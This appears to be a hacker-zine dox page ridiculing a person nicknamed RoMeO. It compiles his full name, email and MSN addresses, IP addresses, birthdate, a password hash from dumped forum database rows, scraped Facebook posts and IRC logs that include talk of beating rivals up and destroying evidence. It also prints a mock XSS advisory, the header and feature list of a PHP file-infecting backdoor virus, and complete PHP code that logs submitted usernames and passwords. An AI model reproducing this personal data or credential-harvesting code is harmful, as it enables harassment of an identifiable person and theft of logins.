http://www.webhostingtalk.com/profile/xRoMeOx
|
||
|
||
UserID: 246663
|
||
Joined: 17/11/2006 11:45:27
|
||
Last Login: 16/01/2008 16:33:17
|
||
Last Active: 16/01/2008 16:33:17
|
||
Website: http://www.darkmindz.com
|
||
MSN: coolking_97@hotmail.com
|
||
Rank: Pentitioner (180 Points)
|
||
Basic: (1) (2) (3) (4) (5)
|
||
Realistic: (1) (2) (3)
|
||
ref: http://www.hackthissite.org/user/view/Nuker
|
||
|
||
// For 2 years you've been strugling to complete the challenges with no apparent luck... or is it skills?
|
||
|
||
|
||
-
|
||
RoMeO is root@DarkMindZ.com * romeo haxxor
|
||
RoMeO is using modes +iwrxt
|
||
RoMeO is connecting from *@absolute.ownage.net 72.20.28.205
|
||
RoMeO is a registered nick
|
||
RoMeO on ~#darkmindz #astalavista #kinqpinz
|
||
RoMeO using twofish.securitychat.org SecurityChat.org ircd
|
||
RoMeO has been idle 6hrs 28mins 18secs, signed on Sat Jun 20 18:35:59
|
||
RoMeO End of /WHOIS list.
|
||
|
||
|
||
Session Start: Tue Jun 09 18:39:34 2009
|
||
Session Ident: #as'#darkmindz
|
||
[16:44:49] <as'RoMeO> we got issues sir
|
||
[16:44:51] <as'RoMeO> get on msn
|
||
|
||
[18:04:23] <as'RoMeO> dmz will never end sir
|
||
[18:04:58] <as'p3ri0d> lol RoMeO
|
||
|
||
[00:13:29] <as'RoMeO> sir
|
||
[00:13:31] <as'pimpinjg> nvm
|
||
[00:13:33] <+as'G-Brain> bsdgurl != bsdgurl
|
||
[00:13:35] <as'RoMeO> ^
|
||
|
||
|
||
[00:49:17] <as'RoMeO> dream on sir
|
||
[00:49:43] <as'Spyware> putting the old dmz back?
|
||
[00:49:49] <as'RoMeO> not doing anything
|
||
|
||
[01:09:28] <as'RoMeO> so you stfu and sit back sir
|
||
[01:09:33] <as'Spyware> You can't disallow people from talking.
|
||
[01:09:36] <as'Spyware> Freedom of Speech, idiot.
|
||
|
||
[01:13:37] <as'RoMeO> what is your point sir
|
||
[01:13:41] <as'Spyware> hang on
|
||
[01:13:47] <as'Spyware> Gotta quote something for you
|
||
|
||
// Sir! sir! keep talking.. someday you might say something intelligent!
|
||
|
||
[03:33:28] <RoMeO> ..
|
||
[03:33:32] <Biber> hhaha
|
||
[03:33:34] <RoMeO> comin to the UK
|
||
[03:33:38] <RoMeO> to kick your ass
|
||
[03:33:43] <AlbinoSkunk> geee someone is going to have to drink some beer with this mofo
|
||
[03:33:44] <Biber> w00t run away AlbinoSkunk!!!
|
||
[03:33:49] <Biber> no wait
|
||
[03:33:55] <Biber> get a baseball bat xD
|
||
[03:34:02] <RoMeO> that wont save you
|
||
[03:34:04] <AlbinoSkunk> RoMeO you best meet up
|
||
[03:34:11] <RoMeO> oh i will
|
||
[03:34:12] <TheM> Better, get one of those no-stab knives they sell up in the U.K.
|
||
[03:34:14] <RoMeO> i wanna meet
|
||
[03:34:15] <RoMeO> xlink
|
||
[03:34:16] <AlbinoSkunk> i got an idea
|
||
[03:34:19] <RoMeO> reaper
|
||
[03:34:21] <RoMeO> mmm
|
||
[03:34:24] <RoMeO> x2fuson
|
||
[03:34:31] <RoMeO> who else
|
||
[03:34:37] <AlbinoSkunk> i kidnap xLink, and a few other dudes and we all go to the next HBH conference
|
||
[03:34:42] <RoMeO> dood i know like 1000 uk hackars
|
||
[03:34:42] <Biber> ill come too, to rob you all!
|
||
[03:34:42] <AlbinoSkunk> and kick ass
|
||
[03:34:50] <RoMeO> lmfao
|
||
[03:34:52] <RoMeO> that would be fun
|
||
[03:34:58] <RoMeO> finally meet cheese
|
||
[03:34:58] <Biber> hhahah yeah
|
||
[03:35:05] <AlbinoSkunk> honestly if you and dick cheese met in the same room
|
||
[03:35:12] <RoMeO> hated him for years, might as well punch him in the face
|
||
[03:35:16] <AlbinoSkunk> that would be crazy
|
||
[03:35:19] <Biber> lmfao totally
|
||
[03:35:26] <RoMeO> very
|
||
[03:35:40] <RoMeO> i gave that guy a headche for 2 years
|
||
[03:35:45] <RoMeO> made him pay more than he earns
|
||
[03:35:48] <Biber> srsly if i went to UK ,the same day i would end up in prison
|
||
[03:36:02] <AlbinoSkunk> haha
|
||
[03:36:05] <RoMeO> there are no prisons in the UK
|
||
[03:36:08] <RoMeO> they just shoot you on sight
|
||
[03:38:05] <AlbinoSkunk> RoMeO, come here on a student loan and visa?
|
||
[03:38:19] <AlbinoSkunk> OOOOH and we have to go to a 2600 meet up just to stir some shit up
|
||
[03:38:27] * AlbinoSkunk herd fags go there
|
||
[03:38:29] <RoMeO> visa
|
||
[03:38:38] <AlbinoSkunk> no loan?
|
||
[03:38:39] <RoMeO> my money
|
||
[03:38:40] <RoMeO> nope
|
||
[03:38:45] * Joins: chaosphe1e (~chaospher@EclipticX-87048C75.pool.einsundeins.de)
|
||
[03:38:48] <AlbinoSkunk> thats very good
|
||
[03:38:51] <RoMeO> lol
|
||
[03:38:57] <RoMeO> will be in london
|
||
[03:39:00] <AlbinoSkunk> are you staying at the uni campus
|
||
[03:39:03] <Biber> when you're coming back,pass by over here,and bring me some UK drugs
|
||
[03:39:04] <RoMeO> nope
|
||
[03:39:06] <AlbinoSkunk> or renting your own place?
|
||
[03:39:08] <Biber> wanna see how they ride
|
||
[03:39:10] <RoMeO> got a friend there
|
||
[03:39:13] <RoMeO> staying with him
|
||
[03:39:19] <AlbinoSkunk> lucky man
|
||
[03:39:21] <RoMeO> hehe
|
||
|
||
|
||
[2:26am] <~RoMeO> this week
|
||
[2:26am] <~RoMeO> everyone wants me down
|
||
[2:26am] <~RoMeO> eeye came on #bhf
|
||
[2:26am] <~RoMeO> and was like
|
||
[2:26am] <~RoMeO> we are sueing you
|
||
[2:26am] <~RoMeO> they spoke to glyph
|
||
[2:26am] <+RCEg0d> yeah i've seen that
|
||
[2:26am] <~RoMeO> admin of irc
|
||
[2:26am] <~RoMeO> and:
|
||
[2:27am] <~RoMeO> <Eye_SRodd> The reports we have are largely anecdotal, but we believe two users called 'Romeo' and 'Darkpontifex' are behind a recent intrusion
|
||
[2:27am] <+RCEg0d> they have no legal right to log or force him to give info
|
||
[2:27am] <~RoMeO> but
|
||
[2:27am] <~RoMeO> they are still after me
|
||
[2:27am] <~RoMeO> and i dont know whos in on it either
|
||
[2:27am] <~RoMeO> but i am sure
|
||
[2:27am] <~RoMeO> some of my close people online
|
||
[2:27am] <~RoMeO> is ratting me out on alot of stuff
|
||
[2:28am] <~RoMeO> and i cant do anything until i know whos in on it
|
||
[2:29am] <~RoMeO> it doesnt go away like that
|
||
[2:29am] <~RoMeO> they are
|
||
[2:29am] <~RoMeO> grouping against me now
|
||
[2:29am] <~RoMeO> not one or 2
|
||
[2:29am] <~RoMeO> like alot of people
|
||
[2:29am] <~RoMeO> and groups
|
||
|
||
// You have no idea, who, where, what and the rest of the 'w's :)
|
||
|
||
[2:29am] <+RCEg0d> wtf?
|
||
[2:29am] <%p3ri0d> don't want to brag for RoMeO but he's one of those that hsould know about it more then anyone else
|
||
[2:29am] <~RoMeO> i am not kidding
|
||
[2:29am] <%p3ri0d> and shit that's bad
|
||
[2:29am] <+RCEg0d> eeye go legal ok...
|
||
[2:29am] <~RoMeO> eeye can go legal
|
||
[2:29am] <~RoMeO> i dont care about the legal part
|
||
[2:29am] <+RCEg0d> the groups?
|
||
[2:29am] <~RoMeO> i am more concerned about the people invovled in it
|
||
[2:30am] <+RCEg0d> dont worry about the legal shit they can't do a thing
|
||
[2:30am] <+RCEg0d> then dont give em information
|
||
[2:30am] <~RoMeO> its a little too late
|
||
[2:30am] <~RoMeO> plus
|
||
[2:30am] <~RoMeO> sopme people
|
||
[2:30am] <~RoMeO> i truted for years online
|
||
[2:30am] <~RoMeO> are aparently going agasint me now
|
||
[2:30am] <~RoMeO> and if they know what i do, they know my operation etc, trhey can do alot of shit against it
|
||
|
||
// Operation Site Down
|
||
|
||
[2:31am] <~RoMeO> its some annoying shit honestl
|
||
[2:31am] <+RCEg0d> i know how it goes
|
||
[2:31am] <~RoMeO> all started on bhf today
|
||
[2:31am] <+RCEg0d> the thing is.. you are too worried and u might end up doing a mistake
|
||
[2:31am] <+RCEg0d> so first you need to relax and take things from the begining
|
||
[2:32am] <~RoMeO> i understand if they are pissed off that i damanged there shit or w/e, but those people whom i trusted going asgainst me, thats bad
|
||
[2:32am] <+RCEg0d> take out of your operations people you might suspect that they are plotting against u
|
||
[2:32am] <~RoMeO> already out
|
||
[2:32am] <~RoMeO> but i dont wanan just
|
||
[2:32am] <~RoMeO> deluser
|
||
[2:32am] <~RoMeO> i wanna be 100% sure
|
||
[2:32am] <~RoMeO> they are plotting agaisnt me
|
||
[2:32am] <~RoMeO> cause if they arent
|
||
[2:32am] <~RoMeO> and i del them
|
||
[2:32am] <~RoMeO> they will
|
||
[2:32am] <~RoMeO> lol
|
||
[2:32am] <+RCEg0d> maby they are afraid of the feds
|
||
[2:32am] <%p3ri0d> bad fucking situation
|
||
[2:33am] <~RoMeO> very bad situation
|
||
[2:34am] <+RCEg0d> thats true
|
||
[2:34am] <~RoMeO> i think the have an idea that
|
||
[2:34am] <~RoMeO> if they fuck with me or they got a few lil info about me
|
||
[2:34am] <~RoMeO> or what i do
|
||
[2:34am] <~RoMeO> they can just shut it down
|
||
[2:34am] <~RoMeO> i have no idea why they think they can do that,but thats the case
|
||
[2:35am] <+RCEg0d> keep your shit private and monitor everything
|
||
[2:35am] <~RoMeO> everything i know of, is already monitored
|
||
[2:35am] <+RCEg0d> if they want to shut you down trust me they will find a way
|
||
[2:35am] <~RoMeO> thst how i know of it in the first plae
|
||
[2:36am] <+RCEg0d> find out who they are
|
||
[2:36am] <~RoMeO> look
|
||
[2:36am] <~RoMeO> the people
|
||
[2:36am] <~RoMeO> who are in on it and i know of
|
||
[2:36am] <~RoMeO> are already comprimised
|
||
[2:36am] <~RoMeO> simple as that
|
||
[2:36am] <~RoMeO> but
|
||
[2:36am] <~RoMeO> i cant do anythin
|
||
[2:39am] <+RCEg0d> itg means they dont even know where you are
|
||
[2:39am] <+RCEg0d> *it
|
||
[2:39am] <~RoMeO> they are getting close to the people i know
|
||
[2:40am] <~RoMeO> and i am getting weird people from all over irc pm' ing me randomly
|
||
[2:40am] <+RCEg0d> darkpontifex?
|
||
[2:40am] <~RoMeO> ctcp requests
|
||
[2:40am] <~RoMeO> dark is a #bhf guy too
|
||
[2:40am] <+RCEg0d> maby them
|
||
[2:40am] <~RoMeO> nah dark cant be on ther side
|
||
[2:40am] <+RCEg0d> he was crying in bhf about going to jail
|
||
[2:40am] <~RoMeO> hha
|
||
[2:41am] <~RoMeO> i am not worried about legailty really, they cant touch me being where i live and who i am
|
||
[2:41am] <~RoMeO> but i am more worried online wise
|
||
[2:41am] <~RoMeO> worked on alot on this
|
||
[2:44am] <%p3ri0d> lol
|
||
[2:45am] <+RCEg0d> haha
|
||
[2:45am] <+RCEg0d> i say we find were they live
|
||
[2:45am] <+RCEg0d> and go beat em up
|
||
[2:45am] <+RCEg0d> :P
|
||
[2:45am] <~RoMeO> thats an option
|
||
[2:45am] <~RoMeO> if shit go really bad
|
||
[2:45am] <+RCEg0d> i can take my rifle with me
|
||
[2:45am] <~RoMeO> but so far
|
||
[2:45am] <~RoMeO> they did try to get what they want from me
|
||
[2:45am] <~RoMeO> they couldnt
|
||
[2:45am] <~RoMeO> so they will try again
|
||
[2:46am] <+RCEg0d> this time u need to be waiting
|
||
[2:46am] <+RCEg0d> if there is anything i can do, tell me
|
||
[2:46am] <~RoMeO> :)
|
||
[2:46am] <%p3ri0d> eh, I need some action too. Count me in
|
||
[2:46am] <+RCEg0d> hehehe
|
||
[2:46am] <~RoMeO> :)
|
||
[2:47am] <~RoMeO> its WAR
|
||
[2:47am] <~RoMeO> the plot thickned alot
|
||
[2:47am] <+RCEg0d> lets kick some ass :P
|
||
[2:47am] <~RoMeO> never thought it would go THIS far
|
||
[2:47am] <~RoMeO> people get owned all the time
|
||
[2:47am] <~RoMeO> but those people took it to the heart
|
||
[2:47am] <~RoMeO> rofl
|
||
[2:51am] <+RCEg0d> well in teh scene, when something bad was about to happen, we changed group names, nicks and dropped all our contacts + servers and started up fresh
|
||
[2:52am] <~RoMeO> there is no group name
|
||
[2:52am] <+RCEg0d> u get my meaning though
|
||
[2:52am] <~RoMeO> my nick isnt easy to just change
|
||
|
||
// Ever tried "/nick <newnick>" ?
|
||
|
||
[2:42pm] <~RoMeO> basically, when i was younger
|
||
[2:42pm] <~RoMeO> i skipped all math classes
|
||
[2:42pm] <~RoMeO> and that affected me alot
|
||
[2:42pm] <+RCEg0d> ah, u didnt get the basics
|
||
[2:42pm] <~RoMeO> since i fucked alot of my basics
|
||
[2:42pm] <~RoMeO> yes
|
||
[2:42pm] <~RoMeO> so when i went to A levels
|
||
[2:42pm] <~RoMeO> i am like ???????
|
||
[2:42pm] <+RCEg0d> yeah its like a chain, break a part and u get fucked :P
|
||
[2:42pm] <~RoMeO> well yea
|
||
[2:42pm] <~RoMeO> i got fucked
|
||
[2:42pm] <~RoMeO> basically
|
||
[2:42pm] <+RCEg0d> how long did u do math A levels?
|
||
[2:42pm] <~RoMeO> 1 year
|
||
[2:42pm] <~RoMeO> this year
|
||
[2:42pm] <~RoMeO> lol
|
||
[2:43pm] <+RCEg0d> hmm
|
||
[2:43pm] <+RCEg0d> well u cant get everything right in 1 year
|
||
[2:43pm] <~RoMeO> well las year
|
||
[2:43pm] <~RoMeO> yea
|
||
[2:43pm] <~RoMeO> but w/e all good now
|
||
[2:43pm] <~RoMeO> got accepted into uni
|
||
[2:43pm] <~RoMeO> and everything
|
||
[2:43pm] <~RoMeO> ^_^
|
||
[2:43pm] <+RCEg0d> cool
|
||
[2:43pm] <+RCEg0d> uk?
|
||
[2:43pm] <~RoMeO> yessir
|
||
[2:43pm] <+RCEg0d> nice
|
||
[2:43pm] <+RCEg0d> me2 :P
|
||
[2:43pm] <~RoMeO> ;D
|
||
[2:43pm] <~RoMeO> nice
|
||
[2:43pm] <+RCEg0d> in bristol
|
||
[2:43pm] <~RoMeO> london
|
||
[2:43pm] <+RCEg0d> comp science ofcourse :P
|
||
[2:44pm] <~RoMeO> software engineeering and multimedia
|
||
[2:44pm] <+RCEg0d> nice
|
||
[2:44pm] <~RoMeO> :]
|
||
[2:44pm] <+RCEg0d> i think i have a friend thats doing that in london
|
||
[2:44pm] <~RoMeO> ask him about it plz
|
||
[2:44pm] <~RoMeO> i dont wanna get into it and get fucked too
|
||
|
||
// You just love getting it, dont ya?
|
||
|
||
[2:44pm] <~RoMeO> xD
|
||
[2:44pm] <~RoMeO> if it involves loads of math, get me out
|
||
[2:45pm] <~RoMeO> i know CS does
|
||
[2:45pm] <+RCEg0d> hmmm
|
||
[2:45pm] <~RoMeO> so thats not an option
|
||
[2:45pm] <+RCEg0d> well it does a lil bit
|
||
[2:45pm] <+RCEg0d> in multimedia
|
||
[2:45pm] <~RoMeO> a lil bit is okay
|
||
[2:45pm] <~RoMeO> you cant runa way from math
|
||
[2:45pm] <~RoMeO> away*
|
||
[2:45pm] <+RCEg0d> he told me that they had to code opengl + C
|
||
[2:45pm] <~RoMeO> lovely
|
||
[2:45pm] <~RoMeO> thats math
|
||
[2:45pm] <~RoMeO> alot of it
|
||
[2:46pm] <~RoMeO> oh
|
||
[2:46pm] <+RCEg0d> but he passed because of the coursework
|
||
[2:46pm] <~RoMeO> theory i hated in computers
|
||
[2:46pm] <~RoMeO> is*
|
||
[2:46pm] <~RoMeO> reminds me of last year and the years before, school theory exams
|
||
[2:46pm] <~RoMeO> i know my shit in practical work
|
||
[2:46pm] <+RCEg0d> hate em
|
||
[2:46pm] <~RoMeO> but theory, its a lil more complicated to get the teacher to understand lol
|
||
[2:47pm] <~RoMeO> you cant exactly attach screenshots
|
||
[2:47pm] <+RCEg0d> hehehe
|
||
[2:48pm] <~RoMeO> btw
|
||
[2:48pm] <~RoMeO> yesterdays threats
|
||
[2:48pm] <+RCEg0d> well with software engineering there's a lot of theory
|
||
[2:48pm] <~RoMeO> 90% terminated
|
||
[2:48pm] <+RCEg0d> yeah?
|
||
[2:48pm] <~RoMeO> :]
|
||
[2:48pm] <+RCEg0d> cool
|
||
[2:48pm] <+RCEg0d> see, everything went alright
|
||
[2:48pm] <~RoMeO> it was a few slips on my end
|
||
[2:48pm] <~RoMeO> all fixed
|
||
[2:48pm] <~RoMeO> i learned a huge deal from it tho
|
||
[2:48pm] <~RoMeO> good thing it was caught
|
||
[2:48pm] <+RCEg0d> what was it?
|
||
[2:49pm] <~RoMeO> wont get into details
|
||
[2:49pm] <~RoMeO> but yea
|
||
[2:49pm] <~RoMeO> i fucked up a bit
|
||
[2:49pm] <~RoMeO> and people
|
||
[2:49pm] <~RoMeO> took advantage
|
||
[2:49pm] <~RoMeO> instantl
|
||
[2:49pm] <~RoMeO> instantly*
|
||
[2:50pm] <+RCEg0d> they got what they wanted?
|
||
[2:50pm] <~RoMeO> nope
|
||
[2:50pm] <~RoMeO> i win
|
||
[2:50pm] <~RoMeO> ;D
|
||
[2:50pm] <+RCEg0d> haha lamerz
|
||
[2:50pm] <~RoMeO> was up all night workin on making sure everything is intact
|
||
[2:50pm] <~RoMeO> tired shitless
|
||
[2:51pm] <+RCEg0d> no sleep?
|
||
[2:51pm] <~RoMeO> slept a bit
|
||
[2:51pm] <~RoMeO> but then woke up
|
||
[2:52pm] <~RoMeO> and was liek
|
||
[2:52pm] <~RoMeO> fuck it
|
||
[2:52pm] <+RCEg0d> on the keyboard?
|
||
[2:52pm] <~RoMeO> gotta get this shit fixed
|
||
[2:52pm] <~RoMeO> ah no, i did that only once
|
||
[2:52pm] <~RoMeO> lolol
|
||
[2:52pm] <+RCEg0d> hehe, u were worried thats why u couldnt sleep
|
||
[2:52pm] <~RoMeO> yea
|
||
[2:52pm] <~RoMeO> cant let this go far
|
||
[2:52pm] <+RCEg0d> yeah i did it a couple of times... bad experience
|
||
[2:52pm] <~RoMeO> it will fucking go nuts
|
||
[2:52pm] <+RCEg0d> especially when u wake up and have QWERTY writen on your forehead
|
||
[2:52pm] <~RoMeO> LOL
|
||
[2:52pm] <~RoMeO> happened to me only once
|
||
[2:53pm] <+RCEg0d> hahaha
|
||
[2:53pm] <~RoMeO> my dad woke me up
|
||
[2:53pm] <~RoMeO> that was
|
||
|
||
[11:01:44] * Joins: as'RoMeO (RoMeO@cloaked-1D0129D7.ownage.net)
|
||
[11:16:43] * Parts: as'Guest45609 (rsca@cloaked-BFBC7842.org)
|
||
[11:16:54] * Joins: as'KO9 (ollie@mudkipz.gov)
|
||
[11:16:54] * as'ChanServ sets mode: +v as'KO9
|
||
[11:17:29] <as'RoMeO> asta is sueing me :(
|
||
[11:17:59] <+as'KO9> wut?
|
||
[11:18:06] <as'RoMeO> this dude
|
||
[11:18:08] <as'RoMeO> came in #bhf
|
||
[11:18:12] <as'RoMeO> and was like
|
||
[11:18:16] <as'RoMeO> ' i am suing you for hacking asta'
|
||
[11:18:21] <as'RoMeO> -_-'
|
||
[11:18:31] <+as'KO9> oh noez
|
||
[11:18:34] <as'RoMeO> i know right
|
||
[11:18:56] <+as'KO9> go get the magnets and destroy your hdd!!1
|
||
[11:19:03] <+as'KO9> must destroy all evidence
|
||
[11:19:18] <as'RoMeO> i must
|
||
[11:19:55] <+as'KO9> EmErgE: so who broke the server?
|
||
[11:20:20] <as'RoMeO> it broked itself
|
||
[11:20:24] <as'RoMeO> it was like SIGFUCK
|
||
|
||
// sigdie(); vs fatal(); - http://www.securityfocus.com/bid/20241
|
||
|
||
[11:20:25] <as'RoMeO> and voom
|
||
[11:20:32] <as'RoMeO> boom*
|
||
[11:20:57] <+as'KO9> ;[
|
||
[11:22:01] <@as'EmErgE> KO9~ can't be sure, it just crashed out of the blue and came back up after working out with the provider
|
||
[11:22:14] * Joins: as'd4de (d4de@1.0.0.127.in-addr.arpa)
|
||
[11:22:14] * as'ChanServ sets mode: +v as'd4de
|
||
[11:26:51] <+as'KO9> EmErgE: weird
|
||
[11:26:59] <+as'KO9> they blatently pulled the power
|
||
[11:27:07] <+as'KO9> and when you spoke to them they were like 'o shi-'
|
||
[11:27:13] <as'RoMeO> xD
|
||
[11:27:17] <as'RoMeO> awknet does that
|
||
[11:27:23] <+as'KO9> heeeeeeeh
|
||
[11:27:26] <+as'KO9> don't get me started on awknet
|
||
[11:27:29] <as'RoMeO> lmao
|
||
[11:27:31] <+as'KO9> Jason is a fucking tosspot
|
||
[11:27:33] <as'RoMeO> do tell
|
||
[11:27:34] <as'RoMeO> LOL
|
||
[11:27:43] <+as'KO9> stole my money
|
||
[11:27:44] <as'RoMeO> oh
|
||
[11:27:44] <as'RoMeO> do tell
|
||
[11:27:53] <+as'KO9> I bought a 'ddos protected' server from him
|
||
[11:28:06] <+as'KO9> server was down for most of the 1 and a half i had it
|
||
[11:28:10] <+as'KO9> and he refused to help
|
||
[11:28:16] <as'RoMeO> ;(
|
||
[11:28:21] <+as'KO9> despite posting him ifconfig's with loads of overruns and shit
|
||
[11:28:32] <+as'KO9> denying it was a network problem when i had another box on his network
|
||
[11:28:44] <+as'KO9> which couldn't even contact my own one
|
||
[11:28:44] <+as'KO9> heh
|
||
[11:28:45] <as'RoMeO> lol
|
||
[11:28:46] <as'RoMeO> sucks
|
||
|
||
|
||
------------[ Advisory:
|
||
|
||
Vulnerable Software: wall on SSH protocol 1 && putty.exe
|
||
Found by: RoMeO && pimpinjg
|
||
Impact: Log bash cookies and massive lulz
|
||
|
||
------------[ PoC:
|
||
|
||
root@server~# wall "<script>alert(1)</script>"
|
||
|
||
http://i43.tinypic.com/21317c6.png
|
||
|
||
// root@mercedes ??
|
||
|
||
[14:52:44] <&RoMeO> http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
|
||
[14:53:42] <connection> RoMeO: now that you've had your fun
|
||
[14:53:46] <&RoMeO> :)
|
||
[14:53:53] <&RoMeO> i had the lulz of a life time
|
||
[14:53:53] <connection> feel like explaining integer underflows
|
||
[14:53:56] <&RoMeO> no
|
||
|
||
.____ ____ ___.____ __________ .___.__ .__
|
||
| | | | \ | \____ / __| _/|__| ______ ____ | | ____ ________ _________ ____
|
||
| | | | / | / / ______ / __ | | |/ ___// ___\| | / _ \/ ___/ | \_ __ \_/ __ \
|
||
| |___| | /| |___ / /_ /_____/ / /_/ | | |\___ \\ \___| |_( <_> )___ \| | /| | \/\ ___/
|
||
|_______ \______/ |_______ \/_______ \ \____ | |__/____ >\___ >____/\____/____ >____/ |__| \___ >
|
||
\/ \/ \/ \/ \/ \/ \/ \/ PRESENTS
|
||
[ XSS in wall on SSH 1 / putty ]
|
||
|
||
|
||
|
||
|
||
Hello there, im new in here, actually im new to the whole fedora project, i have a fedora core 3, and i was trying
|
||
alot to connect it to the internet but no use!
|
||
i have a wireless network at my home, and a modem "Motorolla sm65" i just couldnt install them on the computer, any ideas?
|
||
|
||
you can email me at: romeo.haxxor@gmail.com
|
||
thanks../
|
||
|
||
Join Date: Jan 2007
|
||
Location: Saudi-Arabia
|
||
Posts: 6
|
||
|
||
Ref: http://forums.fedoraforum.org/showthread.php?t=146470
|
||
|
||
/*
|
||
If he can't install a modem then I don't see how he could hack his way out of a wet paper bag...
|
||
oh wait... he can't... he's a skiddie!
|
||
*/
|
||
|
||
|
||
Posted 30 May 2008 - 03:13 AM
|
||
I am glad you like the articles section :) , what about the code base tho? any comments on that maybe?
|
||
|
||
and hm, I have A levels ( GCSE ) exams atm, after that the new release of DMZ will start, and the main
|
||
prios to improve are:
|
||
|
||
- Layout
|
||
- Submit sytem + articles / codes system.
|
||
|
||
all the articles and codes will be reformated to look at its best, etc....
|
||
|
||
@intimidat0r, I sure will :)
|
||
|
||
ref: https://www.binrev.com/forums/index.php/topic/37778-darkmindz/page__view__findpost__p__308906
|
||
|
||
// Your first professional certification I presume?
|
||
|
||
|
||
DarkMindZ
|
||
tags: turbocharged06 romeo r4z0rbl4de the reaper xlink jath darkmindz darkmindz.org dmz hacking hacking
|
||
group underground hackers security experts graphics tutorials learning
|
||
ref: http://www.urbandictionary.com/define.php?term=DarkMindZ
|
||
|
||
/*
|
||
Must suck to have two different conflicting personalities.
|
||
Whats next? Animal Detectives or Horse humpers (http://www.youtube.com/watch?v=Cf3p1mXHfqY)
|
||
*/
|
||
|
||
Facebook Lulz
|
||
-------------
|
||
|
||
Faisal Hourani
|
||
SocialInterview.com asked me "Name someone you wish you could date."
|
||
I answered ''Megan Fox. rawr''
|
||
November 15 at 3:56am via Social Interview <20> Interview Me
|
||
|
||
|
||
Faisal Hourani
|
||
SocialInterview.com asked me "What would your mother think if she saw everything you've posted on Facebook?"
|
||
I answered ''She already checks out everything, everyday. Hi mom :]...''
|
||
November 15 at 10:06pm via Social Interview <20> View Feedback (2)Hide Feedback (2) <20> Interview Me
|
||
|
||
// We hope she checks this out:] Hai Faisal's mom
|
||
|
||
|
||
Faisal Hourani
|
||
SocialInterview.com asked me "If you could rule any country or place, what would you pick?"
|
||
I answered: "The world =O"
|
||
|
||
// You ever thought about Economical Crisis ?
|
||
|
||
|
||
Faisal Hourani they don't call me romeo for jack :P
|
||
Faisal took the How dateable are you? quiz and the result is COMPLETLY DATEABLE!
|
||
You are the perfect gentleman/lady and you know everything anybody needs to know about dating and flirting
|
||
See More
|
||
July 6 at 7:00pm via How dateable are you? <20> View Feedback (2)Hide Feedback (2) <20> Take this Quiz
|
||
|
||
// rawr :] lulz
|
||
|
||
|
||
<EFBFBD>I can<61>t believe that out of 10,000 sperm, you were the quickest.<2E>
|
||
~ Steven Pearl
|
||
|
||
|
||
<?php // DarkMindZ.com
|
||
######################################
|
||
# [ DarkMindZ PHP.Virus v1.5 ] #
|
||
# [ RoMeO ] #
|
||
######################################
|
||
set_time_limit(0);
|
||
ignore_user_abort(1);
|
||
# root@darkmindz.com~ cat /home/pr0jects/virus/intro
|
||
# DMZ PHP.Virus, very simple PHP virus, that would do the following:
|
||
# |1| Look for all PHP files in directory.
|
||
# |2| Check if infected.
|
||
# |3| Infect with your backdoor.
|
||
# |4| Log all infected files, and optional mail them to you.
|
||
# root@darkmindz.com~ exit
|
||
|
||
# [ To-Do ] #
|
||
# Mass infector, infect other users on server.
|
||
# Better Reports, some system info reports too.
|
||
# Spreading, by RFI dorks.
|
||
# Polymorphism //Arxidia!
|
||
#[x] Change user-agent used, 2 backdoors, `include and a CMD exec`. - done a better job here, one backdoor, includes all that :]
|
||
|
||
// Careful not to infect yourself.. There is a polymorphic flu virus on the loose that spreads through RFI..
|
||
|
||
LoginLog By: RoMeO[DarkMindZ.com]
|
||
|
||
Login Log
|
||
<?php
|
||
##################################################
|
||
# LoginLog By: RoMeO[DarkMindZ.com]
|
||
##################################################
|
||
|
||
$saveinsql = 1; # shall we log it in SQL?
|
||
$table = "mylogs";
|
||
$passf = "passw0rd";
|
||
$usrfield = "usern4me";
|
||
$host = "localhost";
|
||
$usr = "roooooooot";
|
||
$pw = "w0000000t";
|
||
$sqldb = "whatever";
|
||
|
||
if($saveinsql) {
|
||
mysql_connect($host, $usr, $pw);
|
||
mysql_select_db($sqldb);
|
||
}
|
||
|
||
$username = $_GET["u"];
|
||
$password = $_GET["p"];
|
||
|
||
|
||
function logit($user, $pass) {
|
||
$file = fopen('_my_log.txt', 'w');
|
||
fwrite($file, "$user:$pass\n");
|
||
fclose($file);
|
||
}
|
||
|
||
function mysqlentry($table, $pass, $user) {
|
||
|
||
$check1 = "SELECT * FROM `$table` WHERE $userf = '$user'";
|
||
$query1 = mysql_query($check1);
|
||
if (!mysql_num_rows($query1) {
|
||
$ok = "INSERT INTO `$table` (`$userf`, `$passf`) VALUES ('$user', '$pass')";
|
||
mysql_query($ok);
|
||
}
|
||
else { $update = "UPDATE $table SET $passf = '$pass' WHERE $userf = '$user'";
|
||
mysql_query($update);
|
||
}
|
||
mysql_close;
|
||
}
|
||
|
||
if(isset($username) && isset($password)) {
|
||
logit($username, $password);
|
||
mysqlentry($table, $password, $username);
|
||
}
|
||
?>
|
||
|
||
ref: http://nepalimadbulls.wetpaint.com/page/Login+Log
|
||
|
||
// As a skiddie, you are NOT supposed to know how to secure your own code..
|
||
|
||
|
||
(4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL)
|
||
(5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down')
|
||
|
||
IP address: 77.30.170.77
|
||
Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa.
|
||
Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist]
|
||
ASN: 25019
|
||
